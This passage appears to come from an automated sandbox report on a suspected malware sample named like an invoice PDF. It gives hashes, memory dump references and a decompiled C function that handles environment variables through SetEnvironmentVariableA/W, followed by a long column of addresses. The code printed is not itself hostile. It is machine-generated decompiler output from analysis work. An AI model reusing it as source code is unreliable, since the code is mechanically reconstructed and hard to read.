                            • Opcode Fuzzy Hash: 56236ffcfb9b47a1f1cb54b1aabb10f73a4baa927081c31a6a0e74f79bbb6241
                            • Instruction Fuzzy Hash: E261AA7164070D96EE3C593C88947BEF7BCEF5570CF44481AEA43DBA8CDA11D9428356
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01316CA0, Relevance: .2, Instructions: 194COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0a10261fc734715ea16eca571b66a854d72724520d3b3f847661583a0c35ea71
                            • Instruction ID: e083f24b7d42fea71da9c658e80d72b2a9cf19c4b21fe623d34729409294914c
                            • Opcode Fuzzy Hash: 0a10261fc734715ea16eca571b66a854d72724520d3b3f847661583a0c35ea71
                            • Instruction Fuzzy Hash: 3C7196756201714FD728CE6DE8D043B77A5E38A301F86462DE686CB38DC638E526D7B4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013261F0, Relevance: 27.4, APIs: 18, Instructions: 419COMMON
                            Download Yara Rule
                            C-Code - Quality: 84%
                            			E013261F0(void* __edx, signed int _a4, signed int _a8) {
				signed int _v0;
				signed char _v5;
				intOrPtr _v8;
				signed char _v9;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v44;
				signed int _v92;
				signed int _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t116;
				signed int _t119;
				signed int _t120;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t127;
				signed int _t131;
				signed int _t133;
				signed int _t136;
				signed int _t138;
				signed int _t139;
				signed int _t142;
				void* _t143;
				signed int _t148;
				signed int* _t150;
				signed int* _t156;
				signed int _t163;
				signed int _t165;
				signed int _t167;
				intOrPtr _t168;
				signed int _t173;
				signed int _t175;
				signed int _t176;
				signed int _t180;
				signed int _t185;
				intOrPtr* _t186;
				signed int _t191;
				signed int _t196;
				signed int _t197;
				signed int _t204;
				intOrPtr* _t205;
				signed int _t214;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int _t220;
				signed int _t221;
				signed int _t223;
				intOrPtr _t225;
				void* _t231;
				signed int _t233;
				void* _t236;
				signed int _t237;
				signed int _t238;
				void* _t241;
				signed int _t244;
				signed int _t246;
				void* _t252;
				signed int _t253;
				signed int _t254;
				void* _t260;
				void* _t262;
				signed int _t263;
				intOrPtr* _t267;
				intOrPtr* _t271;
				signed int _t274;
				signed int _t276;
				signed int _t280;
				signed int _t282;
				void* _t283;
				void* _t284;
				void* _t285;
				void* _t286;
				signed int _t287;
				signed int _t289;
				signed int _t291;
				signed int _t292;
				signed int* _t293;
				signed int _t299;
				signed int _t300;
				CHAR* _t301;
				signed int _t303;
				signed int _t304;
				WCHAR* _t305;
				signed int _t306;
				signed int _t307;
				signed int* _t308;
				signed int _t309;
				signed int _t311;
				void* _t317;
				void* _t318;
				void* _t319;
				void* _t321;
				void* _t322;
				void* _t323;
				void* _t324;

				_t283 = __edx;
				_t217 = _a4;
				if(_t217 != 0) {
					_t287 = _t217;
					_t116 = E01318680(_t217, 0x3d);
					_v16 = _t116;
					_t231 = _t286;
					__eflags = _t116;
					if(_t116 == 0) {
						L10:
						 *((intOrPtr*)(E0131C9CE())) = 0x16;
						goto L11;
					} else {
						__eflags = _t116 - _t217;
						if(_t116 == _t217) {
							goto L10;
						} else {
							__eflags =  *((char*)(_t116 + 1));
							_t299 =  *0x13460bc; // 0x0
							_t120 = _t116 & 0xffffff00 |  *((char*)(_t116 + 1)) == 0x00000000;
							_v5 = _t120;
							__eflags = _t299 -  *0x13460c8; // 0x0
							if(__eflags == 0) {
								L87();
								_t299 = _t120;
								_t120 = _v5;
								_t231 = _t299;
								 *0x13460bc = _t299;
							}
							_t218 = 0;
							__eflags = _t299;
							if(_t299 != 0) {
								L21:
								_t233 = _t287;
								_t122 = _v16 - _t233;
								_push(_t122);
								_push(_t233);
								L121();
								_v12 = _t122;
								__eflags = _t122;
								if(_t122 < 0) {
									L29:
									__eflags = _v5 - _t218;
									if(_v5 != _t218) {
										goto L12;
									} else {
										_t123 =  ~_t122;
										_v12 = _t123;
										_t27 = _t123 + 2; // 0x2
										_t236 = _t27;
										__eflags = _t236 - _t123;
										if(_t236 < _t123) {
											goto L11;
										} else {
											__eflags = _t236 - 0x3fffffff;
											if(_t236 >= 0x3fffffff) {
												goto L11;
											} else {
												_push(4);
												_push(_t236);
												_t300 = E0132850F(_t299);
												E013209EB(_t218);
												_t321 = _t321 + 0x10;
												__eflags = _t300;
												if(_t300 == 0) {
													goto L11;
												} else {
													_t237 = _v12;
													_t287 = _t218;
													_t126 = _a4;
													 *(_t300 + _t237 * 4) = _t126;
													 *(_t300 + 4 + _t237 * 4) = _t218;
													goto L34;
												}
											}
										}
									}
								} else {
									__eflags =  *_t299 - _t218;
									if( *_t299 == _t218) {
										goto L29;
									} else {
										E013209EB( *((intOrPtr*)(_t299 + _t122 * 4)));
										_t282 = _v12;
										__eflags = _v5 - _t218;
										if(_v5 != _t218) {
											while(1) {
												__eflags =  *(_t299 + _t282 * 4) - _t218;
												if( *(_t299 + _t282 * 4) == _t218) {
													break;
												}
												 *(_t299 + _t282 * 4) =  *(_t299 + 4 + _t282 * 4);
												_t282 = _t282 + 1;
												__eflags = _t282;
											}
											_push(4);
											_push(_t282);
											_t300 = E0132850F(_t299);
											E013209EB(_t218);
											_t321 = _t321 + 0x10;
											_t126 = _t287;
											__eflags = _t300;
											if(_t300 != 0) {
												L34:
												 *0x13460bc = _t300;
											}
										} else {
											_t126 = _a4;
											_t287 = _t218;
											 *(_t299 + _t282 * 4) = _t126;
										}
										__eflags = _a8 - _t218;
										if(_a8 == _t218) {
											goto L12;
										} else {
											_t238 = _t126;
											_t284 = _t238 + 1;
											do {
												_t127 =  *_t238;
												_t238 = _t238 + 1;
												__eflags = _t127;
											} while (_t127 != 0);
											_v12 = _t238 - _t284 + 2;
											_t301 = E01320B10(_t238 - _t284, _t238 - _t284 + 2, 1);
											_pop(_t241);
											__eflags = _t301;
											if(_t301 == 0) {
												L42:
												E013209EB(_t301);
												goto L12;
											} else {
												_t131 = E01320A73(_t301, _v12, _a4);
												_t322 = _t321 + 0xc;
												__eflags = _t131;
												if(_t131 != 0) {
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
													E01321798();
													asm("int3");
													_t317 = _t322;
													_t323 = _t322 - 0xc;
													_push(_t218);
													_t220 = _v44;
													__eflags = _t220;
													if(_t220 != 0) {
														_push(_t301);
														_push(_t287);
														_push(0x3d);
														_t289 = _t220;
														_t133 = E013188E7(_t241);
														_v20 = _t133;
														_t244 = _t220;
														__eflags = _t133;
														if(_t133 == 0) {
															L54:
															 *((intOrPtr*)(E0131C9CE())) = 0x16;
															goto L55;
														} else {
															__eflags = _t133 - _t220;
															if(_t133 == _t220) {
																goto L54;
															} else {
																_t303 =  *0x13460c0; // 0x1084680
																_t221 = 0;
																__eflags =  *(_t133 + 2);
																_t246 = _t244 & 0xffffff00 |  *(_t133 + 2) == 0x00000000;
																_v9 = _t246;
																__eflags = _t303 -  *0x13460c4; // 0x10542f0
																if(__eflags == 0) {
																	_push(_t303);
																	L104();
																	_t246 = _v9;
																	_t303 = _t133;
																	 *0x13460c0 = _t303;
																}
																__eflags = _t303;
																if(_t303 != 0) {
																	L64:
																	_v20 = _v20 - _t289 >> 1;
																	_t138 = E0132682B(_t289, _v20 - _t289 >> 1);
																	_v16 = _t138;
																	__eflags = _t138;
																	if(_t138 < 0) {
																		L72:
																		__eflags = _v9 - _t221;
																		if(_v9 != _t221) {
																			goto L56;
																		} else {
																			_t139 =  ~_t138;
																			_v16 = _t139;
																			_t72 = _t139 + 2; // 0x2
																			_t252 = _t72;
																			__eflags = _t252 - _t139;
																			if(_t252 < _t139) {
																				goto L55;
																			} else {
																				__eflags = _t252 - 0x3fffffff;
																				if(_t252 >= 0x3fffffff) {
																					goto L55;
																				} else {
																					_push(4);
																					_push(_t252);
																					_t304 = E0132850F(_t303);
																					E013209EB(_t221);
																					_t323 = _t323 + 0x10;
																					__eflags = _t304;
																					if(_t304 == 0) {
																						goto L55;
																					} else {
																						_t253 = _v16;
																						_t289 = _t221;
																						_t142 = _v0;
																						 *(_t304 + _t253 * 4) = _t142;
																						 *(_t304 + 4 + _t253 * 4) = _t221;
																						goto L77;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags =  *_t303 - _t221;
																		if( *_t303 == _t221) {
																			goto L72;
																		} else {
																			E013209EB( *((intOrPtr*)(_t303 + _t138 * 4)));
																			_t276 = _v16;
																			__eflags = _v9 - _t221;
																			if(_v9 != _t221) {
																				while(1) {
																					__eflags =  *(_t303 + _t276 * 4) - _t221;
																					if( *(_t303 + _t276 * 4) == _t221) {
																						break;
																					}
																					 *(_t303 + _t276 * 4) =  *(_t303 + 4 + _t276 * 4);
																					_t276 = _t276 + 1;
																					__eflags = _t276;
																				}
																				_push(4);
																				_push(_t276);
																				_t304 = E0132850F(_t303);
																				E013209EB(_t221);
																				_t323 = _t323 + 0x10;
																				_t142 = _t289;
																				__eflags = _t304;
																				if(_t304 != 0) {
																					L77:
																					 *0x13460c0 = _t304;
																				}
																			} else {
																				_t142 = _v0;
																				_t289 = _t221;
																				 *(_t303 + _t276 * 4) = _t142;
																			}
																			__eflags = _a4 - _t221;
																			if(_a4 == _t221) {
																				goto L56;
																			} else {
																				_t254 = _t142;
																				_t81 = _t254 + 2; // 0x2
																				_t285 = _t81;
																				do {
																					_t143 =  *_t254;
																					_t254 = _t254 + 2;
																					__eflags = _t143 - _t221;
																				} while (_t143 != _t221);
																				_t82 = (_t254 - _t285 >> 1) + 2; // 0x0
																				_v16 = _t82;
																				_t305 = E01320B10(_t254 - _t285 >> 1, _t82, 2);
																				_pop(_t258);
																				__eflags = _t305;
																				if(_t305 == 0) {
																					L85:
																					E013209EB(_t305);
																					goto L56;
																				} else {
																					_t148 = E0132618C(_t305, _v16, _v0);
																					_t324 = _t323 + 0xc;
																					__eflags = _t148;
																					if(_t148 != 0) {
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						E01321798();
																						asm("int3");
																						_push(_t317);
																						_t318 = _t324;
																						_push(_t289);
																						_t291 = _v92;
																						__eflags = _t291;
																						if(_t291 != 0) {
																							_t260 = 0;
																							_t150 = _t291;
																							__eflags =  *_t291;
																							if( *_t291 != 0) {
																								do {
																									_t150 =  &(_t150[1]);
																									_t260 = _t260 + 1;
																									__eflags =  *_t150;
																								} while ( *_t150 != 0);
																							}
																							_t93 = _t260 + 1; // 0x2
																							_t306 = E01320B10(_t260, _t93, 4);
																							_t262 = _t305;
																							__eflags = _t306;
																							if(_t306 == 0) {
																								L102:
																								E01320ACD(_t221, _t285, _t291, _t306);
																								goto L103;
																							} else {
																								__eflags =  *_t291;
																								if( *_t291 == 0) {
																									L100:
																									E013209EB(0);
																									_t175 = _t306;
																									goto L101;
																								} else {
																									_push(_t221);
																									_t221 = _t306 - _t291;
																									__eflags = _t221;
																									do {
																										_t271 =  *_t291;
																										_t94 = _t271 + 1; // 0x5
																										_t285 = _t94;
																										do {
																											_t176 =  *_t271;
																											_t271 = _t271 + 1;
																											__eflags = _t176;
																										} while (_t176 != 0);
																										_t262 = _t271 - _t285;
																										_t95 = _t262 + 1; // 0x6
																										_v16 = _t95;
																										 *(_t221 + _t291) = E01320B10(_t262, _t95, 1);
																										E013209EB(0);
																										_t324 = _t324 + 0xc;
																										__eflags =  *(_t221 + _t291);
																										if( *(_t221 + _t291) == 0) {
																											goto L102;
																										} else {
																											_t180 = E01320A73( *(_t221 + _t291), _v16,  *_t291);
																											_t324 = _t324 + 0xc;
																											__eflags = _t180;
																											if(_t180 != 0) {
																												L103:
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												E01321798();
																												asm("int3");
																												_push(_t318);
																												_t319 = _t324;
																												_push(_t262);
																												_push(_t262);
																												_push(_t291);
																												_t292 = _v128;
																												__eflags = _t292;
																												if(_t292 != 0) {
																													_push(_t221);
																													_t223 = 0;
																													_t156 = _t292;
																													_t263 = 0;
																													_v20 = 0;
																													_push(_t306);
																													__eflags =  *_t292;
																													if( *_t292 != 0) {
																														do {
																															_t156 =  &(_t156[1]);
																															_t263 = _t263 + 1;
																															__eflags =  *_t156;
																														} while ( *_t156 != 0);
																													}
																													_t104 = _t263 + 1; // 0x2
																													_t307 = E01320B10(_t263, _t104, 4);
																													__eflags = _t307;
																													if(_t307 == 0) {
																														L119:
																														E01320ACD(_t223, _t285, _t292, _t307);
																														goto L120;
																													} else {
																														__eflags =  *_t292 - _t223;
																														if( *_t292 == _t223) {
																															L117:
																															E013209EB(_t223);
																															_t167 = _t307;
																															goto L118;
																														} else {
																															_t223 = _t307 - _t292;
																															__eflags = _t223;
																															do {
																																_t267 =  *_t292;
																																_t105 = _t267 + 2; // 0x6
																																_t285 = _t105;
																																do {
																																	_t168 =  *_t267;
																																	_t267 = _t267 + 2;
																																	__eflags = _t168 - _v20;
																																} while (_t168 != _v20);
																																_t107 = (_t267 - _t285 >> 1) + 1; // 0x3
																																_v24 = _t107;
																																 *(_t223 + _t292) = E01320B10(_t267 - _t285 >> 1, _t107, 2);
																																E013209EB(0);
																																_t324 = _t324 + 0xc;
																																__eflags =  *(_t223 + _t292);
																																if( *(_t223 + _t292) == 0) {
																																	goto L119;
																																} else {
																																	_t173 = E0132618C( *(_t223 + _t292), _v24,  *_t292);
																																	_t324 = _t324 + 0xc;
																																	__eflags = _t173;
																																	if(_t173 != 0) {
																																		L120:
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		E01321798();
																																		asm("int3");
																																		_push(_t319);
																																		_push(_t223);
																																		_push(_t307);
																																		_push(_t292);
																																		_t293 =  *0x13460bc; // 0x0
																																		_t308 = _t293;
																																		__eflags =  *_t293;
																																		if( *_t293 == 0) {
																																			L127:
																																			_t309 = _t308 - _t293;
																																			__eflags = _t309;
																																			_t311 =  ~(_t309 >> 2);
																																		} else {
																																			_t225 = _v8;
																																			do {
																																				_t163 = E0132C265(_v12,  *_t308, _t225);
																																				_t324 = _t324 + 0xc;
																																				__eflags = _t163;
																																				if(_t163 != 0) {
																																					goto L126;
																																				} else {
																																					_t165 =  *((intOrPtr*)(_t225 +  *_t308));
																																					__eflags = _t165 - 0x3d;
																																					if(_t165 == 0x3d) {
																																						L129:
																																						_t311 = _t308 - _t293 >> 2;
																																					} else {
																																						__eflags = _t165;
																																						if(_t165 == 0) {
																																							goto L129;
																																						} else {
																																							goto L126;
																																						}
																																					}
																																				}
																																				goto L128;
																																				L126:
																																				_t308 =  &(_t308[1]);
																																				__eflags =  *_t308;
																																			} while ( *_t308 != 0);
																																			goto L127;
																																		}
																																		L128:
																																		return _t311;
																																	} else {
																																		goto L115;
																																	}
																																}
																																goto L130;
																																L115:
																																_t292 = _t292 + 4;
																																__eflags =  *_t292 - _t173;
																															} while ( *_t292 != _t173);
																															_t223 = 0;
																															__eflags = 0;
																															goto L117;
																														}
																													}
																												} else {
																													_t167 = 0;
																													L118:
																													return _t167;
																												}
																											} else {
																												goto L98;
																											}
																										}
																										goto L130;
																										L98:
																										_t291 = _t291 + 4;
																										__eflags =  *_t291 - _t180;
																									} while ( *_t291 != _t180);
																									goto L100;
																								}
																							}
																						} else {
																							_t175 = 0;
																							L101:
																							return _t175;
																						}
																					} else {
																						_t274 =  &(_t305[_v20 + 1]);
																						 *(_t274 - 2) = _t148;
																						asm("sbb eax, eax");
																						_t185 = SetEnvironmentVariableW(_t305,  !( ~(_v9 & 0x000000ff)) & _t274);
																						__eflags = _t185;
																						if(_t185 == 0) {
																							_t186 = E0131C9CE();
																							_t221 = _t221 | 0xffffffff;
																							__eflags = _t221;
																							 *_t186 = 0x2a;
																						}
																						goto L85;
																					}
																				}
																			}
																		}
																	}
																} else {
																	_t191 =  *0x13460bc; // 0x0
																	__eflags = _a4 - _t221;
																	if(_a4 == _t221) {
																		L58:
																		__eflags = _t246;
																		if(_t246 != 0) {
																			goto L56;
																		} else {
																			__eflags = _t191;
																			if(_t191 != 0) {
																				L62:
																				 *0x13460c0 = E01320B10(_t246, 1, 4);
																				E013209EB(_t221);
																				_t323 = _t323 + 0xc;
																				goto L63;
																			} else {
																				 *0x13460bc = E01320B10(_t246, 1, 4);
																				E013209EB(_t221);
																				_t323 = _t323 + 0xc;
																				__eflags =  *0x13460bc - _t221; // 0x0
																				if(__eflags == 0) {
																					goto L55;
																				} else {
																					_t303 =  *0x13460c0; // 0x1084680
																					__eflags = _t303;
																					if(_t303 != 0) {
																						goto L64;
																					} else {
																						goto L62;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags = _t191;
																		if(_t191 == 0) {
																			goto L58;
																		} else {
																			_t196 = L0131FF04(_t221);
																			__eflags = _t196;
																			if(_t196 != 0) {
																				L63:
																				_t303 =  *0x13460c0; // 0x1084680
																				__eflags = _t303;
																				if(_t303 == 0) {
																					L55:
																					_t221 = _t220 | 0xffffffff;
																					__eflags = _t221;
																					L56:
																					E013209EB(_t289);
																					_t136 = _t221;
																					goto L57;
																				} else {
																					goto L64;
																				}
																			} else {
																				goto L54;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t197 = E0131C9CE();
														 *_t197 = 0x16;
														_t136 = _t197 | 0xffffffff;
														L57:
														return _t136;
													}
												} else {
													_t280 = _v16 + 1 + _t301 - _a4;
													asm("sbb eax, eax");
													 *(_t280 - 1) = _t218;
													_t204 = SetEnvironmentVariableA(_t301,  !( ~(_v5 & 0x000000ff)) & _t280);
													__eflags = _t204;
													if(_t204 == 0) {
														_t205 = E0131C9CE();
														_t218 = _t218 | 0xffffffff;
														__eflags = _t218;
														 *_t205 = 0x2a;
													}
													goto L42;
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L14:
									__eflags = _t120;
									if(_t120 == 0) {
										 *0x13460bc = E01320B10(_t231, 1, 4);
										E013209EB(_t218);
										_t299 =  *0x13460bc; // 0x0
										_t321 = _t321 + 0xc;
										__eflags = _t299;
										if(_t299 == 0) {
											goto L11;
										} else {
											__eflags =  *0x13460c0 - _t218; // 0x1084680
											if(__eflags != 0) {
												goto L20;
											} else {
												 *0x13460c0 = E01320B10(_t231, 1, 4);
												E013209EB(_t218);
												_t321 = _t321 + 0xc;
												__eflags =  *0x13460c0 - _t218; // 0x1084680
												if(__eflags == 0) {
													goto L11;
												} else {
													goto L19;
												}
											}
										}
									} else {
										_t218 = 0;
										goto L12;
									}
								} else {
									__eflags =  *0x13460c0 - _t218; // 0x1084680
									if(__eflags == 0) {
										goto L14;
									} else {
										_t214 = L0131FEFF(0, _t283);
										__eflags = _t214;
										if(_t214 != 0) {
											L19:
											_t299 =  *0x13460bc; // 0x0
											L20:
											__eflags = _t299;
											if(_t299 == 0) {
												L11:
												_t218 = _t217 | 0xffffffff;
												__eflags = _t218;
												L12:
												E013209EB(_t287);
												_t119 = _t218;
												goto L13;
											} else {
												goto L21;
											}
										} else {
											goto L10;
										}
									}
								}
							}
						}
					}
				} else {
					_t215 = E0131C9CE();
					 *_t215 = 0x16;
					_t119 = _t215 | 0xffffffff;
					L13:
					return _t119;
				}
				L130:
			}









































































































                            0x013261f0
                            0x013261f9
                            0x013261fe
                            0x01326215
                            0x01326217
                            0x0132621c
                            0x01326220
                            0x01326221
                            0x01326223
                            0x01326273
                            0x01326278
                            0x00000000
                            0x01326225
                            0x01326225
                            0x01326227
                            0x00000000
                            0x01326229
                            0x01326229
                            0x0132622d
                            0x01326233
                            0x01326236
                            0x01326239
                            0x0132623f
                            0x01326242
                            0x01326247
                            0x01326249
                            0x0132624c
                            0x0132624d
                            0x0132624d
                            0x01326253
                            0x01326255
                            0x01326257
                            0x013262eb
                            0x013262ee
                            0x013262f0
                            0x013262f2
                            0x013262f3
                            0x013262f4
                            0x013262f9
                            0x013262fe
                            0x01326300
                            0x0132634a
                            0x0132634a
                            0x0132634d
                            0x00000000
                            0x01326353
                            0x01326353
                            0x01326355
                            0x01326358
                            0x01326358
                            0x0132635b
                            0x0132635d
                            0x00000000
                            0x01326363
                            0x01326363
                            0x01326369
                            0x00000000
                            0x0132636f
                            0x0132636f
                            0x01326371
                            0x01326379
                            0x0132637b
                            0x01326380
                            0x01326383
                            0x01326385
                            0x00000000
                            0x0132638b
                            0x0132638b
                            0x0132638e
                            0x01326390
                            0x01326393
                            0x01326396
                            0x00000000
                            0x01326396
                            0x01326385
                            0x01326369
                            0x0132635d
                            0x01326302
                            0x01326302
                            0x01326304
                            0x00000000
                            0x01326306
                            0x01326309
                            0x0132630f
                            0x01326312
                            0x01326315
                            0x01326329
                            0x01326329
                            0x0132632c
                            0x00000000
                            0x00000000
                            0x01326325
                            0x01326328
                            0x01326328
                            0x01326328
                            0x0132632e
                            0x01326330
                            0x01326338
                            0x0132633a
                            0x0132633f
                            0x01326342
                            0x01326344
                            0x01326346
                            0x0132639a
                            0x0132639a
                            0x0132639a
                            0x01326317
                            0x01326317
                            0x0132631a
                            0x0132631c
                            0x0132631c
                            0x013263a0
                            0x013263a3
                            0x00000000
                            0x013263a9
                            0x013263a9
                            0x013263ab
                            0x013263ae
                            0x013263ae
                            0x013263b0
                            0x013263b1
                            0x013263b1
                            0x013263bd
                            0x013263c5
                            0x013263c8
                            0x013263c9
                            0x013263cb
                            0x01326414
                            0x01326415
                            0x00000000
                            0x013263cd
                            0x013263d4
                            0x013263d9
                            0x013263dc
                            0x013263de
                            0x01326420
                            0x01326421
                            0x01326422
                            0x01326423
                            0x01326424
                            0x01326425
                            0x0132642a
                            0x0132642e
                            0x01326430
                            0x01326433
                            0x01326434
                            0x01326437
                            0x01326439
                            0x0132644b
                            0x0132644c
                            0x0132644d
                            0x01326450
                            0x01326452
                            0x01326457
                            0x0132645b
                            0x0132645c
                            0x0132645e
                            0x013264af
                            0x013264b4
                            0x00000000
                            0x01326460
                            0x01326460
                            0x01326462
                            0x00000000
                            0x01326464
                            0x01326464
                            0x0132646a
                            0x0132646c
                            0x01326470
                            0x01326473
                            0x01326476
                            0x0132647c
                            0x0132647e
                            0x0132647f
                            0x01326485
                            0x01326488
                            0x0132648a
                            0x0132648a
                            0x01326490
                            0x01326492
                            0x0132651f
                            0x0132652a
                            0x0132652d
                            0x01326532
                            0x01326537
                            0x01326539
                            0x01326583
                            0x01326583
                            0x01326586
                            0x00000000
                            0x0132658c
                            0x0132658c
                            0x0132658e
                            0x01326591
                            0x01326591
                            0x01326594
                            0x01326596
                            0x00000000
                            0x0132659c
                            0x0132659c
                            0x013265a2
                            0x00000000
                            0x013265a8
                            0x013265a8
                            0x013265aa
                            0x013265b2
                            0x013265b4
                            0x013265b9
                            0x013265bc
                            0x013265be
                            0x00000000
                            0x013265c4
                            0x013265c4
                            0x013265c7
                            0x013265c9
                            0x013265cc
                            0x013265cf
                            0x00000000
                            0x013265cf
                            0x013265be
                            0x013265a2
                            0x01326596
                            0x0132653b
                            0x0132653b
                            0x0132653d
                            0x00000000
                            0x0132653f
                            0x01326542
                            0x01326548
                            0x0132654b
                            0x0132654e
                            0x01326562
                            0x01326562
                            0x01326565
                            0x00000000
                            0x00000000
                            0x0132655e
                            0x01326561
                            0x01326561
                            0x01326561
                            0x01326567
                            0x01326569
                            0x01326571
                            0x01326573
                            0x01326578
                            0x0132657b
                            0x0132657d
                            0x0132657f
                            0x013265d3
                            0x013265d3
                            0x013265d3
                            0x01326550
                            0x01326550
                            0x01326553
                            0x01326555
                            0x01326555
                            0x013265d9
                            0x013265dc
                            0x00000000
                            0x013265e2
                            0x013265e2
                            0x013265e4
                            0x013265e4
                            0x013265e7
                            0x013265e7
                            0x013265ea
                            0x013265ed
                            0x013265ed
                            0x013265f8
                            0x013265fc
                            0x01326604
                            0x01326607
                            0x01326608
                            0x0132660a
                            0x01326651
                            0x01326652
                            0x00000000
                            0x0132660c
                            0x01326614
                            0x01326619
                            0x0132661c
                            0x0132661e
                            0x0132665d
                            0x0132665e
                            0x0132665f
                            0x01326660
                            0x01326661
                            0x01326662
                            0x01326667
                            0x0132666a
                            0x0132666b
                            0x0132666e
                            0x0132666f
                            0x01326672
                            0x01326674
                            0x0132667d
                            0x0132667f
                            0x01326681
                            0x01326683
                            0x01326685
                            0x01326685
                            0x01326688
                            0x01326689
                            0x01326689
                            0x01326685
                            0x0132668f
                            0x0132669a
                            0x0132669d
                            0x0132669e
                            0x013266a0
                            0x01326707
                            0x01326707
                            0x00000000
                            0x013266a2
                            0x013266a2
                            0x013266a5
                            0x013266f7
                            0x013266f9
                            0x013266ff
                            0x00000000
                            0x013266a7
                            0x013266a7
                            0x013266aa
                            0x013266aa
                            0x013266ac
                            0x013266ac
                            0x013266ae
                            0x013266ae
                            0x013266b1
                            0x013266b1
                            0x013266b3
                            0x013266b4
                            0x013266b4
                            0x013266b8
                            0x013266bc
                            0x013266c0
                            0x013266ca
                            0x013266cd
                            0x013266d2
                            0x013266d5
                            0x013266d9
                            0x00000000
                            0x013266db
                            0x013266e3
                            0x013266e8
                            0x013266eb
                            0x013266ed
                            0x0132670c
                            0x0132670e
                            0x0132670f
                            0x01326710
                            0x01326711
                            0x01326712
                            0x01326713
                            0x01326718
                            0x0132671b
                            0x0132671c
                            0x0132671e
                            0x0132671f
                            0x01326720
                            0x01326721
                            0x01326724
                            0x01326726
                            0x0132672f
                            0x01326730
                            0x01326732
                            0x01326734
                            0x01326736
                            0x01326739
                            0x0132673a
                            0x0132673c
                            0x0132673e
                            0x0132673e
                            0x01326741
                            0x01326742
                            0x01326742
                            0x0132673e
                            0x01326746
                            0x01326751
                            0x01326755
                            0x01326757
                            0x013267c5
                            0x013267c5
                            0x00000000
                            0x01326759
                            0x01326759
                            0x0132675b
                            0x013267b5
                            0x013267b6
                            0x013267bc
                            0x00000000
                            0x0132675d
                            0x0132675f
                            0x0132675f
                            0x01326761
                            0x01326761
                            0x01326763
                            0x01326763
                            0x01326766
                            0x01326766
                            0x01326769
                            0x0132676c
                            0x0132676c
                            0x01326778
                            0x0132677c
                            0x01326784
                            0x0132678a
                            0x0132678f
                            0x01326792
                            0x01326796
                            0x00000000
                            0x01326798
                            0x013267a0
                            0x013267a5
                            0x013267a8
                            0x013267aa
                            0x013267ca
                            0x013267cc
                            0x013267cd
                            0x013267ce
                            0x013267cf
                            0x013267d0
                            0x013267d1
                            0x013267d6
                            0x013267d9
                            0x013267dc
                            0x013267dd
                            0x013267de
                            0x013267df
                            0x013267e5
                            0x013267e7
                            0x013267ea
                            0x01326816
                            0x01326816
                            0x01326816
                            0x0132681b
                            0x013267ec
                            0x013267ec
                            0x013267ef
                            0x013267f5
                            0x013267fa
                            0x013267fd
                            0x013267ff
                            0x00000000
                            0x01326801
                            0x01326803
                            0x01326806
                            0x01326808
                            0x01326824
                            0x01326826
                            0x0132680a
                            0x0132680a
                            0x0132680c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132680c
                            0x01326808
                            0x00000000
                            0x0132680e
                            0x0132680e
                            0x01326811
                            0x01326811
                            0x00000000
                            0x013267ef
                            0x0132681d
                            0x01326823
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013267aa
                            0x00000000
                            0x013267ac
                            0x013267ac
                            0x013267af
                            0x013267af
                            0x013267b3
                            0x013267b3
                            0x00000000
                            0x013267b3
                            0x0132675b
                            0x01326728
                            0x01326728
                            0x013267c0
                            0x013267c4
                            0x013267c4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013266ed
                            0x00000000
                            0x013266ef
                            0x013266ef
                            0x013266f2
                            0x013266f2
                            0x00000000
                            0x013266f6
                            0x013266a5
                            0x01326676
                            0x01326676
                            0x01326702
                            0x01326706
                            0x01326706
                            0x01326620
                            0x01326624
                            0x01326627
                            0x01326631
                            0x01326639
                            0x0132663f
                            0x01326641
                            0x01326643
                            0x01326648
                            0x01326648
                            0x0132664b
                            0x0132664b
                            0x00000000
                            0x01326641
                            0x0132661e
                            0x0132660a
                            0x013265dc
                            0x0132653d
                            0x01326498
                            0x01326498
                            0x0132649d
                            0x013264a0
                            0x013264cd
                            0x013264cd
                            0x013264cf
                            0x00000000
                            0x013264d1
                            0x013264d1
                            0x013264d3
                            0x013264fe
                            0x01326508
                            0x0132650d
                            0x01326512
                            0x00000000
                            0x013264d5
                            0x013264df
                            0x013264e4
                            0x013264e9
                            0x013264ec
                            0x013264f2
                            0x00000000
                            0x013264f4
                            0x013264f4
                            0x013264fa
                            0x013264fc
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013264fc
                            0x013264f2
                            0x013264d3
                            0x013264a2
                            0x013264a2
                            0x013264a4
                            0x00000000
                            0x013264a6
                            0x013264a6
                            0x013264ab
                            0x013264ad
                            0x01326515
                            0x01326515
                            0x0132651b
                            0x0132651d
                            0x013264ba
                            0x013264ba
                            0x013264ba
                            0x013264bd
                            0x013264be
                            0x013264c5
                            0x00000000
